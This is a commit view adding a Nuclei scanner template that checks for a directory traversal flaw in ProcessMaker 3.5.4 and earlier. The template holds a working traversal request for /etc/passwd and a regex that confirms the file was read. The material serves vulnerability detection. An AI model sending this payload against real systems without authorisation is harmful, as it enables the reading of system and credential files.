Merge pull request #2527 from projectdiscovery/processmaker-lfi
Create processmaker-lfi.yamlpatch-1
commit
208d137e2a
|
@ -0,0 +1,27 @@
|
|||
id: processmaker-lfi
|
||||
|
||||
info:
|
||||
name: ProcessMaker <= 3.5.4 Directory Traversal
|
||||
author: KrE80r
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50229
|
||||
- https://www.processmaker.com
|
||||
tags: processmaker,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /../../../..//etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue